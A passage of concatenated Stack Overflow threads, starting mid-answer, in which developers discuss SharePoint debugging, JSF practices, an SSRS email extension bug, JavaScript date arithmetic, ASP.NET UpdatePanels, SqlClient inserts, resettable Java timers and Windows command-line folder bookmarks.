assert( false && "this parameter type not specialised in the visitor" ); } void visit( const ParameterLimitedInt& ) const; // specialised implementations... } Thus if accept() returns false, you know the concrete type for the Parameter has not implemented the visitor pattern yet (in case there is additional logic you would prefer to handle on a case by case basis). If the assert() in the visitor pattern triggers, its because its not visiting a Parameter type which you've implemented a specialisation for. One downside to all of this is that unsupported visits are only caught at runtime.
{ "language": "en", "url": "https://stackoverflow.com/questions/31913", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "9" }
Q: How to make the process of debugging ASP.NET Sharepoint applications less time consuming? I'm comparing it Java where you can start your application server in debug mode, then attach your IDE to the server. And you can change your code "on the fly" without restarting the server. As long as your changes don't affect any method signatures or fields you can just hit recompile for a class and the application server (servlet container) will reload the class. I suppose this is impossible in ASP.NET since all classes are packed into assemblies and you cannot unload/reload assemblies, can you ? So when you have an .aspx page and an assembly deployed to GAC and your codebehind changes you have to redeploy the assembly and reset IIS. I'm talking about Sharepoint applications in particular and I'm not sure whether you have to do iisreset for private assemblies but I guess you have too. So the best way to debug aspx pages with code behind I guess would be to get rid of the codebehind for the time of active debugging and move into the page, then when it is more or less working move it back to codebehind. (This would be applicable only for application pages in Sharepoint, site pages don't allow inline code ) How do you approach debugging of your ASP.NET applications to make it less time consuming? A: From Matt Smiths blog on how to get F5 debugging with sharepoint. A very cool trick. * *Create a web application project in Visual Studio (File -> New -> Project -> ASP.Net Web Application, not File -> New -> Web Site). *Move the .csproj and .csproj.user files, along with the Properties folder, into C:\inetpub\wwwroot\wss\virtualdirectories\, where is the name or number of the web application corresponding to the SharePoint site you'd like to debug on. *Attach the project to an existing solution (e.g. STSDEV project). *Set as startup project (right-click project name, "Set as Startup Project"). *Access project properties (right-click project name, "Properties") and click *Under the "Servers" setting, click "Use IIS web server", then enter the URL to the SharePoint web application you want to debug on, e.g. http://mymachine:99. A: Yes private assemblies DO NOT require reset of the IIS. So you should just to xcopy new version to the application's Bin directory and refresh the page (e.g. by VS post build event as I did). But there are some trade offs. You should decrease trust level in application web.config file: <system.web> ... <trust level="WSS_Medium" originUrl="" /> ... </system.web> By the way. I do not suggest to deploy like this. It's just workaround for comfort write-test-debug cycle length. A: If you are using the GAC, you can at least do iisapp.vbs /a "App Pool Name" /r instead of iisreset (it's quicker to recycle a single app pool than to restart IIS). A: First, develop on a computer running SharePoint. Preferably, this means running Windows Server 2003 on Virtual PC or VMWare. This will let you deploy and debug SharePoint code directly, rather than having to copy files between servers and use the remote debugger. Use a VS add-in to simplify the process of deployment and debugging. I've been using WSPBuilder but I think there are others out there. WSPBuilder has commands to deploy solutions, package them as WSPs, and attach your debugger to the local IIS process. It won't allow you to add/remove assemblies on the fly, but you can set breakpoints and run code through the Immediate window in VS. Depending on how your production server is configured, it's usually a good idea to develop on a server with full/trust security settings, including disallowing code blocks in ASPX files. This makes debugging a little more difficult, but it reduces the number of nasty surprises you'll have when your code is finally deployed to production. A: And you can change your code "on the fly" without restarting the server You can accomplish this with ASP.net if you make a Web Site project (as opposed to a Web Application Project). Using a Web Site project, you can post changes to code-behinds without having to refresh anything on the server, and the server does the compile work for you on all code changes. See here for more info on this. This should also solve your difficulties with deploying the assembly to the GAC. As the server handles all compilations for Web Site projects, you wont have to redeploy any assemblies when changing files. A: Use an automated testing framework (NUnit) to write integration tests. This won't work for everything, but of course, it depends on what you're testing. If you also have TestDriven.NET installed, you can run individual tests with the debugger. This has been helpful. A: WSPBuilder Extensions has a "deploy to GAC" shortcut, unfortunately it never works for me. But it's a really quick way to code->compile->test. If you're not using WSPBuilder Extensions, you can instead open a command prompt and run gacutil /u yourassemblynamegoeshere gacutil /i yourdllgoeshere.dll If you do this often, you can put it in a post-build event or in a batch file. Also, I'm unclear whether the gacutil /u (to remove the DLL first) is necessary. A: What it seems like you're trying to do is tell Sharepoint "When I start debugging in Visual Studio, use the version of the DLL that was compiled in the project's /bin/debug directory instead of the version of the DLL that is registered in the GAC." I haven't solved that problem, but here is how I debug Sharepoint. A developer machine is Win2008, IIS 7, MOSS 2007, VisStudio 2008, and WSP Builder installed. Inside VS2008, a button is added to attach to w3p.exe process, Andrew's HOWTO attach to w3p The solution file has two projects: * First project is the .WSP that deploys all the app pages, including the DLL. Use WSPBuilder menu items for handling the .WSP creation and deployment. * Second project is for the DLL behind the pages. If you want the DLL to be copied to the GAC regularly, add a post-build event to the DLL's project that copies from /bin/Debug to the GAC. But, these days, I find I have just been recompiling the solution and then deploying the .WSP using the menu items, and then starting up the debugger using the button. It takes me an F-key and 3 clicks and about a minute for most of my projects, but I suppose it could be quicker.
{ "language": "en", "url": "https://stackoverflow.com/questions/31919", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "6" }
Q: What are the best practices for JSF? I have done Java and JSP programming in the past, but I am new to Java Server Faces and want to know if there's a set of best practices for JSF development. A: Consider using facelets- it greatly simplifies the worst parts of JSF development. I'm doing a CMS-based JSF project now without facelets (after doing a project with it) and it feels like my left arm is missing.... A: I would strongly recommend getting someone experienced in JSF to lead your first project in JSF even if this means paying a contractor for 3 months. The JSF approach is very different to JSP. The way you approach and solve problems is very different. Libraries Consider the following libraries: * *Tomahawk *RichFaces *Shale *Trinidad *Spring Architecture Embrace MVC you need not only to know what this means but use it extensively. There are two main patterns for associating controllers with the views Dot Net Style, One Request controller per view Every top level page has a request scoped controller (bean) all validation and actions of the page use this class. Also used for filtering and ordering the Model. The Model will be stored on a few session level controllers which will handle talking to the back-end (EJBs, or persistence layer) these session controllers should be implementing the business logic and have no knowledge of JSF,HTML or any presentation technology. Controllers are session level Design controllers based on your data model, nest them with in each other. (This post is getting too long so I wont go into the nuts and bolts of these). Knowledge Required Everyone: * *Life Cycle *MDC *Component based development *Tags in h: and f: At Least One Person: * *Creating Custom Components *Limitations to JSF (back button, random navigation, etc) *Debug 3rd party libraries (At least one person has to be comfortable breaking out the debugger and stepping into the implementation of JSF (easiest with open source implementations like MyFaces)) A: Some tips: Understand the JSF request lifecycle and where your various pieces of code fit in it. Especially find out why your model values will not be updated if there are validation errors. Choose a tag library and then stick with it. Take your time to determine your needs and prototype different libraries. Mixing different taglibs may cause severe harm to your mental health. A: * *Add my vote for facelets. I've recently upgraded a project to use facelets, and it solves some big issues with jsf, specially giving you a decent template system right out of the box and letting you use standard html when it is appropriate, without wrapping it in "verbatim"-tags. *RestFaces is a solution to the get/post problem that many people complain about. It's also well documented and easy to use. *Don't use to many taglibs. It makes the job a lot harder when upgrading. *SEAM collects many of the JSF best practices, but I haven't used it yet, so I can't really recommend it, just recommend you to take a look at it. A: I have been using the IBM implementation of JSf and have some comments. It is not a bad way to go but you have to commit to the IBM 'way-of-life'. They have written their own tag lib which extends the JSF standard. If you can manage to stay inside of Rational Application Developer (RAD) (which does not get updated THAT often), the integration is sometimes buggy but overall decent. Also the integration with WebSphere is pretty good. Unless your employer plays golf with IBM, I think it is better to stay as vanilla as possible. A: I am not yet aware of a "Best Practice" for cross field / form level validation. That is, JSF validation is currently orientated to single field validation. IMO it gets ugly when you look at complex cross field / form level validation. Old but still looks acurate to me http://weblogs.java.net/blog/johnreynolds/archive/2004/07/improve_jsf_by_1.html http://www.jroller.com/robwilliams/entry/jsf_multi_field_validation_not A: You could check it the following link in where you could find interesting articles http://www.jsftutorials.net/ A: Select a good component library .Do not use richfaces , i suggest you dont use jsf , use spring mvc,jquery fro view and json in a rest architecture. but if you have to ,use primefaces it easy to use and has enough components.
{ "language": "en", "url": "https://stackoverflow.com/questions/31924", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "11" }
Q: Sending e-mail from a Custom SQL Server Reporting Services Delivery Extension I've developed my own delivery extension for Reporting Services 2005, to integrate this with our SaaS marketing solution. It takes the subscription, and takes a snapshot of the report with a custom set of parameters. It then renders the report, sends an e-mail with a link and the report attached as XLS. Everything works fine, until mail delivery... Here's my code for sending e-mail: public static List<string> SendMail(SubscriptionData data, Stream reportStream, string reportName, string smptServerHostname, int smtpServerPort) { List<string> failedRecipients = new List<string>(); MailMessage emailMessage = new MailMessage(data.ReplyTo, data.To); emailMessage.Priority = data.Priority; emailMessage.Subject = data.Subject; emailMessage.IsBodyHtml = false; emailMessage.Body = data.Comment; if (reportStream != null) { Attachment reportAttachment = new Attachment(reportStream, reportName); emailMessage.Attachments.Add(reportAttachment); reportStream.Dispose(); } try { SmtpClient smtp = new SmtpClient(smptServerHostname, smtpServerPort); // Send the MailMessage smtp.Send(emailMessage); } catch (SmtpFailedRecipientsException ex) { // Delivery failed for the recipient. Add the e-mail address to the failedRecipients List failedRecipients.Add(ex.FailedRecipient); } catch (SmtpFailedRecipientException ex) { // Delivery failed for the recipient. Add the e-mail address to the failedRecipients List failedRecipients.Add(ex.FailedRecipient); } catch (SmtpException ex) { throw ex; } catch (Exception ex) { throw ex; } // Return the List of failed recipient e-mail addresses, so the client can maintain its list. return failedRecipients; } Values for SmtpServerHostname is localhost, and port is 25. I veryfied that I can actually send mail, by using Telnet. And it works. Here's the error message I get from SSRS: ReportingServicesService!notification!4!08/28/2008-11:26:17:: Notification 6ab32b8d-296e-47a2-8d96-09e81222985c completed. Success: False, Status: Exception Message: Failure sending mail. Stacktrace: at MyDeliveryExtension.MailDelivery.SendMail(SubscriptionData data, Stream reportStream, String reportName, String smptServerHostname, Int32 smtpServerPort) in C:\inetpub\wwwroot\CustomReporting\MyDeliveryExtension\MailDelivery.cs:line 48 at MyDeliveryExtension.MyDelivery.Deliver(Notification notification) in C:\inetpub\wwwroot\CustomReporting\MyDeliveryExtension\MyDelivery.cs:line 153, DeliveryExtension: My Delivery, Report: Clicks Development, Attempt 1 ReportingServicesService!dbpolling!4!08/28/2008-11:26:17:: NotificationPolling finished processing item 6ab32b8d-296e-47a2-8d96-09e81222985c Could this have something to do with Trust/Code Access Security? My delivery extension is granted full trust in rssrvpolicy.config: <CodeGroup class="UnionCodeGroup" version="1" PermissionSetName="FullTrust" Name="MyDelivery_CodeGroup" Description="Code group for MyDelivery extension"> <IMembershipCondition class="UrlMembershipCondition" version="1" Url="C:\Program Files\Microsoft SQL Server\MSSQL.2\Reporting Services\ReportServer\bin\MyDeliveryExtension.dll" /> </CodeGroup> Could trust be an issue here? Another theory: SQL Server and SSRS was installed in the security context of Local System. Am I right, or is this service account restricted access to any network resource? Even its own SMTP Server? I tried changing all SQL Server Services logons to Administrator - but still without any success. I also tried logging onto the SMTP server in my code, by proviiding: NetworkCredential("Administrator", "password") and also NetworkCredential("Administrator", "password", "MyRepServer") Can anyone help here, please? A: What's at: at MyDeliveryExtension.MailDelivery.SendMail(SubscriptionData data, Stream reportStream, String reportName, String smptServerHostname, Int32 smtpServerPort) in C:\inetpub\wwwroot\CustomReporting\MyDeliveryExtension\MailDelivery.cs:line 48 at MyDeliveryExtension.MyDelivery.Deliver(Notification notification) in C:\inetpub\wwwroot\CustomReporting\MyDeliveryExtension\MyDelivery.cs:line 153 Also you seem to be disposing the report stream, but that should be done by whatever opened that stream, not your method (it won't be obvious that attaching a stream disposes it). You're losing part of your stack trace due to how you re-throw exceptions. Don't throw the ex variable, just throw is enough. Try this tweak: public static List<string> SendMail(SubscriptionData data, Stream reportStream, string reportName, string smptServerHostname, int smtpServerPort) { List<string> failedRecipients = new List<string>(); MailMessage emailMessage = new MailMessage(data.ReplyTo, data.To) { Priority = data.Priority, Subject = data.Subject, IsBodyHtml = false, Body = data.Comment }; if (reportStream != null) emailMessage.Attachments.Add(new Attachment(reportStream, reportName)); try { SmtpClient smtp = new SmtpClient(smptServerHostname, smtpServerPort); // Send the MailMessage smtp.Send(emailMessage); } catch (SmtpFailedRecipientsException ex) { // Delivery failed for the recipient. Add the e-mail address to the failedRecipients List failedRecipients.Add(ex.FailedRecipient); //are you missing a loop here? only one failed address will ever be returned } catch (SmtpFailedRecipientException ex) { // Delivery failed for the recipient. Add the e-mail address to the failedRecipients List failedRecipients.Add(ex.FailedRecipient); } // Return the List of failed recipient e-mail addresses, so the client can maintain its list. return failedRecipients; } A: I tried to remove the reportStream Attachment: //if (reportStream != null) //emailMessage.Attachments.Add(new Attachment(reportStream, reportName)); And now it works fine. So it is something to do with the reportStream. A: After fooling around with the tunctionallity that gets the reportStream, I was able to fix the mail sending problem. The error wasn't in the SendMail method, but somewehere else. The exception was thrown in the context, of SendMail though. Buggered! A: That's why you have to avoid: catch (Exception ex) { throw ex; } As that basically cloaks your exception in a new one. If you use: catch (Exception ex) { throw; //note: no ex } It keeps the original exception and stack trace. A: FileStream m_fileStream = null; m_files = notification.Report.Render(format, null); RenderedOutputFile m_renderedOutputFile = m_files[0]; m_fileStream = new FileStream(fileName, FileMode.Create, FileAccess.Write); m_renderedOutputFile.Data.Seek((long)0, SeekOrigin.Begin); byte[] arr = new byte[(int)m_renderedOutputFile.Data.Length + 1]; m_renderedOutputFile.Data.Read(arr, 0, (int)m_renderedOutputFile.Data.Length); m_fileStream.Write(arr, 0, (int)m_renderedOutputFile.Data.Length); m_fileStream.Close();
{ "language": "en", "url": "https://stackoverflow.com/questions/31930", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "2" }
Q: What's the simplest way to decrement a date in Javascript by 1 day? I need to decrement a Javascript date by 1 day, so that it rolls back across months/years correctly. That is, if I have a date of 'Today', I want to get the date for 'Yesterday'. It always seems to take more code than necessary when I do this, so I'm wondering if there's any simpler way. What's the simplest way of doing this? [Edit: Just to avoid confusion in an answer below, this is a JavaScript question, not a Java one.] A: var today = new Date(); var yesterday = new Date().setDate(today.getDate() -1); A: day.setDate(day.getDate() -1); //will be wrong this will return wrong day. under UTC -03:00, check for var d = new Date(2014,9,19); d.setDate(d.getDate()-1);// will return Oct 17 Better use: var n = day.getTime(); n -= 86400000; day = new Date(n); //works fine for everything A: getDate()-1 should do the trick Quick example: var day = new Date( "January 1 2008" ); day.setDate(day.getDate() -1); alert(day); A: origDate = new Date(); decrementedDate = new Date(origDate.getTime() - (86400 * 1000)); console.log(decrementedDate); A: var d = new Date(); d.setDate(d.getDate() - 1); console.log(d); A: setDate(dayValue) dayValue is an integer from 1 to 31, representing the day of the month. from https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/Date/setDate The behaviour solving your problem (and mine) seems to be out of specification range. What seems to be needed are addDate(), addMonth(), addYear() ... functions. A: Working with dates in JS can be a headache. So the simplest way is to use moment.js for any date operations. To subtract one day: const date = moment().subtract(1, 'day')
{ "language": "en", "url": "https://stackoverflow.com/questions/31931", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "23" }
Q: ASP.NET AJAX: Firing an UpdatePanel after the page load is complete I'm sure this is easy but I can't figure it out: I have an ASP.NET page with some UpdatePanels on it. I want the page to completely load with some 'Please wait' text in the UpdatePanels. Then once the page is completely loaded I want to call a code-behind function to update the UpdatePanel. Any ideas as to what combination of Javascript and code-behind I need to implement this idea? SAL PS: I've tried putting my function call in the Page_Load but then code is run before the page is delivered and, as the function I want to run takes some time, the page simply takes too long to load up. A: I fiddled around with the ScriptManager suggestions - which I reckon I would have eventually got working but it seems to me that the Timer idea is easier to implement and not really(!) that much of a hack?! Here's how I got my panel updated after the initial page render was complete... default.aspx <%@ Page Language="C#" AutoEventWireup="true" CodeBehind="Default.aspx.cs" Inherits="AJAXPostLoadCall._Default" %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head runat="server"> <title>Untitled Page</title> </head> <body> <form id="form1" runat="server"> <h2>And now for a magic trick...</h2> <asp:ScriptManager ID="ScriptManager1" runat="server" EnablePartialRendering="True"> </asp:ScriptManager> <div> <asp:UpdatePanel ID="UpdatePanel1" runat="server"> <ContentTemplate> <asp:Timer ID="Timer1" runat="server" Interval="2000" ontick="Timer1_Tick" /> <asp:Label ID="Label1" runat="server">Something magic is about to happen...</asp:Label> </ContentTemplate> </asp:UpdatePanel> </div> </form> </body> </html> and the code behind default.aspx.cs reads using System; using System.Collections; using System.Configuration; using System.Data; using System.Linq; using System.Web; using System.Web.Security; using System.Web.UI; using System.Web.UI.HtmlControls; using System.Web.UI.WebControls; using System.Web.UI.WebControls.WebParts; using System.Xml.Linq; namespace AJAXPostLoadCall { public partial class _Default : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { } public void DoMagic() { Label1.Text = "Abracadabra"; } protected void Timer1_Tick(object sender, EventArgs e) { // Do the magic, then disable the timer DoMagic(); Timer1.Enabled = false; } } } So, the page loads up and the Timer (contained within the UpdatePanel) fires 2 secs after the page has loaded up (I think - I'm not sure when the Timer actually starts?). The label text is rewritten and then the Timer is disabled to stop any more updates. Simple enough - but can you purists out there tell me if this is a Horrible Hack? A: Have a look at ScriptManager.RegisterStartupScript The idea is that you register a script to run on start up (I believe once the page has loaded). Your script should call a function that causes a post back through your UpdatePanel A: Use a timer control that will be fired after a certain number of milliseconds (for page to load). In the timer tick event refresh the update panel. A: Doing things like this with UpdatePanels rather than something easily understandable WILL bite you, it's just a matter of when. A: From the very first question on this post, I think what the user is looking for is a message to be displayed to the user while the update panel loads. Just put an UpdateProgress control like the one below on your page just above your UpdatePanel control, and feel free to trigger an event in your UpdatePanel, put your backend code as usual, and whatever is contained inside the UpdateProgress control will load up while your UpdatePanel content is being processed in the backend. <asp:UpdateProgress AssociatedUpdatePanelID="UpdatePanel1" ID="UpdateProgress1" runat="server"> <ProgressTemplate> <div class="mystyleclass"> Please Wait... </div> </ProgressTemplate> </asp:UpdateProgress> There is no need for any messy manual javascript stuff. A: The ScriptManager.RegisterStartupScript allows a script to run on startup inside of an update panel. if you use the old ClientScript.RegisterStartupScript then the script you render will be outside the bounds of the udpate panel, and thus won't be executed during async page loads. A: Using Tom's approach with the startup script, you can then call: __doPostBack('UpdatePanelName', ''); A: A thumbs-up and thanks to SAL and the rest of you guys. This solved a big issue I had, my procedure was taking up to a minute for the page to finally render and display. Thanks!
{ "language": "en", "url": "https://stackoverflow.com/questions/31935", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "9" }
Q: C# - SQLClient - Simplest INSERT I'm basically trying to figure out the simplest way to perform your basic insert operation in C#.NET using the SqlClient namespace. I'm using SqlConnection for my db link, I've already had success executing some reads, and I want to know the simplest way to insert data. I'm finding what seem to be pretty verbose methods when I google. A: Since you seem to be just getting started with this now is the best time to familiarize yourself with the concept of a Data Access Layer (obligatory wikipedia link). It will be very helpful for you down the road when you're apps have more interaction with the database throughout and you want to minimize code duplication. Also makes for more consistent behavior, making testing and tons of other things easier. A: using (var conn = new SqlConnection(yourConnectionString)) { var cmd = new SqlCommand("insert into Foo values (@bar)", conn); cmd.Parameters.AddWithValue("@bar", 17); conn.Open(); cmd.ExecuteNonQuery(); } A: using (SqlConnection myConnection new SqlConnection("Your connection string")) { SqlCommand myCommand = new SqlCommand("INSERT INTO ... VALUES ...", myConnection); myConnection.Open(); myCommand.ExecuteNonQuery(); }
{ "language": "en", "url": "https://stackoverflow.com/questions/32000", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "10" }
Q: Resettable Java Timer I'd like to have a java.utils.Timer with a resettable time in java.I need to set a once off event to occur in X seconds. If nothing happens in between the time the timer was created and X seconds, then the event occurs as normal. If, however, before X seconds has elapsed, I decide that the event should occur after Y seconds instead, then I want to be able to tell the timer to reset its time so that the event occurs in Y seconds. E.g. the timer should be able to do something like: Timer timer = new Timer(); timer.schedule(timerTask, 5000); //Timer starts in 5000 ms (X) //At some point between 0 and 5000 ms... setNewTime(timer, 8000); //timerTask will fire in 8000ms from NOW (Y). I don't see a way to do this using the utils timer, as if you call cancel() you cannot schedule it again. The only way I've come close to replicating this behavior is by using javax.swing.Timer and involves stopping the origional timer, and creating a new one. i.e.: timer.stop(); timer = new Timer(8000, ActionListener); timer.start(); Is there an easier way?? A: According to the Timer documentation, in Java 1.5 onwards, you should prefer the ScheduledThreadPoolExecutor instead. (You may like to create this executor using Executors.newSingleThreadScheduledExecutor() for ease of use; it creates something much like a Timer.) The cool thing is, when you schedule a task (by calling schedule()), it returns a ScheduledFuture object. You can use this to cancel the scheduled task. You're then free to submit a new task with a different triggering time. ETA: The Timer documentation linked to doesn't say anything about ScheduledThreadPoolExecutor, however the OpenJDK version had this to say: Java 5.0 introduced the java.util.concurrent package and one of the concurrency utilities therein is the ScheduledThreadPoolExecutor which is a thread pool for repeatedly executing tasks at a given rate or delay. It is effectively a more versatile replacement for the Timer/TimerTask combination, as it allows multiple service threads, accepts various time units, and doesn't require subclassing TimerTask (just implement Runnable). Configuring ScheduledThreadPoolExecutor with one thread makes it equivalent to Timer. A: The whole Code snippet goes like this .... I hope it will be help full { Runnable r = new ScheduleTask(); ReschedulableTimer rescheduleTimer = new ReschedulableTimer(); rescheduleTimer.schedule(r, 10*1000); public class ScheduleTask implements Runnable { public void run() { //Do schecule task } } class ReschedulableTimer extends Timer { private Runnable task; private TimerTask timerTask; public void schedule(Runnable runnable, long delay) { task = runnable; timerTask = new TimerTask() { public void run() { task.run(); } }; timer.schedule(timerTask, delay); } public void reschedule(long delay) { System.out.println("rescheduling after seconds "+delay); timerTask.cancel(); timerTask = new TimerTask() { public void run() { task.run(); } }; timer.schedule(timerTask, delay); } } } A: If your Timer is only ever going to have one task to execute then I would suggest subclassing it: import java.util.Timer; import java.util.TimerTask; public class ReschedulableTimer extends Timer { private Runnable task; private TimerTask timerTask; public void schedule(Runnable runnable, long delay) { task = runnable; timerTask = new TimerTask() { @Override public void run() { task.run(); } }; this.schedule(timerTask, delay); } public void reschedule(long delay) { timerTask.cancel(); timerTask = new TimerTask() { @Override public void run() { task.run(); } }; this.schedule(timerTask, delay); } } You will need to work on the code to add checks for mis-use, but it should achieve what you want. The ScheduledThreadPoolExecutor does not seem to have built in support for rescheduling existing tasks either, but a similar approach should work there as well. A: Do you need to schedule a recurring task? In that case I recommend you consider using Quartz. A: I don't think it's possible to do it with Timer/TimerTask, but depending on what exactly you want to achieve you might be happy with using java.util.concurrent.ScheduledThreadPoolExecutor. A: this is what I'm trying out. I have a class that polls a database every 60 seconds using a TimerTask. in my main class, I keep the instance of the Timer, and an instance of my local subclass of TimerTask. the main class has a method to set the polling interval (say going from 60 to 30). in it, i cancel my TimerTask (which is my subclass, where I overwrote the cancel() method to do some cleanup, but that shouldn't matter) and then make it null. i recreate a new instance of it, and schedule the new instance at the new interval in the existing Timer. since the Timer itself isn't canceled, the thread it was using stays active (and so would any other TimerTasks inside it), and the old TimerTask is replaced with a new one, which happens to be the same, but VIRGIN (since the old one would have been executed or scheduled, it is no longer VIRGIN, as required for scheduling). when i want to shutdown the entire timer, i cancel and null the TimerTask (same as i did when changing the timing, again, for cleaning up resources in my subclass of TimerTask), and then i cancel and null the Timer itself. A: Here is the example for Resetable Timer . Try to change it for your convinence... package com.tps.ProjectTasks.TimeThread; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.text.SimpleDateFormat; import java.util.Date; import java.util.Timer; import java.util.TimerTask; /** * Simple demo that uses java.util.Timer to schedule a task to execute * every 5 seconds and have a delay if you give any input in console. */ public class DateThreadSheduler extends Thread { Timer timer; BufferedReader br ; String data = null; Date dNow ; SimpleDateFormat ft; public DateThreadSheduler() { timer = new Timer(); timer.schedule(new RemindTask(), 0, 5*1000); br = new BufferedReader(new InputStreamReader(System.in)); start(); } public void run(){ while(true){ try { data =br.readLine(); if(data != null && !data.trim().equals("") ){ timer.cancel(); timer = new Timer(); dNow = new Date( ); ft = new SimpleDateFormat ("E yyyy.MM.dd 'at' hh:mm:ss a zzz"); System.out.println("Modified Current Date ------> " + ft.format(dNow)); timer.schedule(new RemindTask(), 5*1000 , 5*1000); } }catch (IOException e) { e.printStackTrace(); } } } public static void main(String args[]) { System.out.format("Printint the time and date was started...\n"); new DateThreadSheduler(); } } class RemindTask extends TimerTask { Date dNow ; SimpleDateFormat ft; public void run() { dNow = new Date(); ft = new SimpleDateFormat ("E yyyy.MM.dd 'at' hh:mm:ss a zzz"); System.out.println("Current Date: " + ft.format(dNow)); } } This example prints the current date and time for every 5 seconds...But if you give any input in console the timer will be delayed to perform the given input task... A: I made an own timer class for a similar purpose; feel free to use it: public class ReschedulableTimer extends Timer { private Runnable mTask; private TimerTask mTimerTask; public ReschedulableTimer(Runnable runnable) { this.mTask = runnable; } public void schedule(long delay) { if (mTimerTask != null) mTimerTask.cancel(); mTimerTask = new TimerTask() { @Override public void run() { mTask.run(); } }; this.schedule(mTimerTask, delay); } }
{ "language": "en", "url": "https://stackoverflow.com/questions/32001", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "40" }
Q: Tool for commandline "bookmarks" on windows? Im searching a tool which allows me to specify some folders as "bookmarks" and than access them on the commandline (on Windows XP) via a keyword. Something like: C:\> go home D:\profiles\user\home\> go svn-project1 D:\projects\project1\svn\branch\src\> I'm currently using a bunch of batch files, but editing them by hand is a daunting task. On Linux there is cdargs or shell bookmarks but I haven't found something on windows. Thanks for the Powershell suggestion, but I'm not allowed to install it on my box at work, so it should be a "classic" cmd.exe solution. A: I was looking for this exact functionality, for simple cases. Couldn't find a solution, so I made one myself: @ECHO OFF REM Source found on https://github.com/DieterDePaepe/windows-scripts REM Please share any improvements made! REM Folder where all links will end up set WARP_REPO=%USERPROFILE%\.warp IF [%1]==[/?] GOTO :help IF [%1]==[--help] GOTO :help IF [%1]==[/create] GOTO :create IF [%1]==[/remove] GOTO :remove IF [%1]==[/list] GOTO :list set /p WARP_DIR=<%WARP_REPO%\%1 cd %WARP_DIR% GOTO :end :create IF [%2]==[] ( ECHO Missing name for bookmark GOTO :EOF ) if not exist %WARP_REPO%\NUL mkdir %WARP_REPO% ECHO %cd% > %WARP_REPO%\%2 ECHO Created bookmark "%2" GOTO :end :list dir %WARP_REPO% /B GOTO :end :remove IF [%2]==[] ( ECHO Missing name for bookmark GOTO :EOF ) if not exist %WARP_REPO%\%2 ( ECHO Bookmark does not exist: %2 GOTO :EOF ) del %WARP_REPO%\%2 GOTO :end :help ECHO Create or navigate to folder bookmarks. ECHO. ECHO warp /? Display this help ECHO warp [bookmark] Navigate to existing bookmark ECHO warp /remove [bookmark] Remove an existing bookmark ECHO warp /create [bookmark] Navigate to existing bookmark ECHO warp /list List existing bookmarks ECHO. :end You can list, create and delete bookmarks. The bookmarks are stored in text files in a folder in your user directory. Usage (copied from current version): A folder bookmarker for use in the terminal. c:\Temp>warp /create temp # Create a new bookmark Created bookmark "temp" c:\Temp>cd c:\Users\Public # Go somewhere else c:\Users\Public>warp temp # Go to the stored bookmark c:\Temp> Every warp uses a pushd command, so you can trace back your steps using popd. c:\Users\Public>warp temp c:\Temp>popd c:\Users\Public> Open a folder of a bookmark in explorer using warp /window <bookmark>. List all available options using warp /?. A: With just a Batch file, try this... (save as filename "go.bat") @echo off set BookMarkFolder=c:\data\cline\bookmarks\ if exist %BookMarkFolder%%1.lnk start %BookMarkFolder%%1.lnk if exist %BookMarkFolder%%1.bat start %BookMarkFolder%%1.bat if exist %BookMarkFolder%%1.vbs start %BookMarkFolder%%1.vbs if exist %BookMarkFolder%%1.URL start %BookMarkFolder%%1.URL Any shortcuts, batch files, VBS Scripts or Internet shortcuts you put in your bookmark folder (in this case "c:\data\cline\bookmarks\" can then be opened / accessed by typing "go bookmarkname" e.g. I have a bookmark called "stack.url". Typing go stack takes me straight to this page. You may also want to investigate Launchy A: With PowerShell you could add the folders as variables in your profile.ps1 file, like: $vids="C:\Users\mabster\Videos" Then, like Unix, you can just refer to the variables in your commands: cd $vids Having a list of variable assignments in the one ps1 file is probably easier than maintaining separate batch files. A: What you are looking for is called DOSKEY You can use the doskey command to create macros in the command interpreter. For example: doskey mcd=mkdir "$*"$Tpushd "$*" creates a new command "mcd" that creates a new directory and then changes to that directory (I prefer "pushd" to "cd" in this case because it lets me use "popd" later to go back to where I was before) The $* will be replaced with the remainder of the command line after the macro, and the $T is used to delimit the two different commands that I want to evaluate. If I typed: mcd foo/bar at the command line, it would be equivalent to: mkdir "foo/bar"&pushd "foo/bar" The next step is to create a file that contains a set of macros which you can then import by using the /macrofile switch. I have a file (c:\tools\doskey.macros) which defines the commands that I regularly use. Each macro should be specified on a line with the same syntax as above. But you don't want to have to manually import your macros every time you launch a new command interpreter, to make it happen automatically, just open up the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun and set the value to be doskey /macrofile "c:\tools\doskey.macro". Doing this will make sure that your macros are automatically predefined every time you start a new interpreter. Extra thoughts: - If you want to do other things in AutoRun (like set environment parameters), you can delimit the commands with the ampersand. Mine looks like: set root=c:\SomeDir&doskey /macrofile "c:\tools\doskey.macros" - If you prefer that your AutoRun settings be set per-user, you can use the HKCU node instead of HKLM. - You can also use doskey to control things like the size of the command history. - I like to end all of my navigation macros with \$* so that I can chain things together - Be careful to add quotes as appropriate in your macros if you want to be able to handle paths with spaces in them. A: Another alternative approach you may want to consider could be to have a folder that contains symlinks to each of your projects or frequently-used directories. So you can do something like cd \go\svn-project-1 cd \go\my-douments Symlinks can be made on a NTFS disk using the Junction tool A: Without Powershell you can do it like this: C:\>set DOOMED=c:\windows C:\>cd %DOOMED% C:\WINDOWS> A: Crono wrote: Are Environment variables defined via "set" not meant for the current session only? Can I persist them? They are set for the current process, and by default inherited by any process that it creates. They are not persisted to the registry. Their scope can be limited in cmd scripts with "setlocal" (and "endlocal"). A: Environment variables? set home=D:\profiles\user\home set svn-project1=D:\projects\project1\svn\branch\src cd %home% On Unix I use this along with popd/pushd/cd - all the time.
